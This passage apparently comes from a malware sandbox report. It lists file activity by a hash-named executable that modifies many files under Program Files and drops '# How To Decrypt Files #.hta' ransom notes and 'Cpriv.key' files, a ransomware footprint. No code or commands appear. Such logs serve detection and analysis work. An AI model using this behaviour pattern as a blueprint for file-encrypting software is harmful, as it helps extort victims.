Files\Microsoft Office\Office14\1033\GrooveForms5\bg_OliveGreen.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\it\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\blank.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\STUDIO\STUDIO.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterRegular.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Defender\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\1033\Access\Part\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OEMPRINT.CAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL.DEV_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00255_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_matte.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mscss7cm_fr.dub de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\ACCWIZ\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_OliveGreen.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02287_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKREQL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PAGESIZE\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02431_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_Off.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SONORA\SONORA.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0185604.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\row_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00373_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL044.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7ES.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\el\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-j2se-1.0.2.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\mux\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\MENUS.JS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.commands_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\OUTDR_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00411_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double_bkg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPrintTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00809_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsVersion1Warning.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL095.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\AD.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Perf_Scenes_Subpicture1.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14579_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Technic.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\WidevineCdm\_platform_specific\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199283.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099180.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0384900.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dialog.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Defender\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Small_News.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\CAGCAT10.MMW de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGLOGO.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Media Renderer\DMR_120.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\numbase.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GRAPH_COL.HXC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR26F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\GostName.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Folders\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-2.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_h.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00685_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19986_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185774.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PARNT_10.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_sun.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsImageTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00795_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\mscss7cm_en.dub de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.MY.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099194.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0222021.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\TALK21.COM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Genko_1.emf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passportcover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00437_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR51B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EVRGREEN\EVRGREEN.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbytools.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21336_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSTH7FR.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\deployed\jdk16\windows-amd64\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19828_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198016.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\BG_ADOBE.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Person.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Marketing Projects.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00530_.WMF 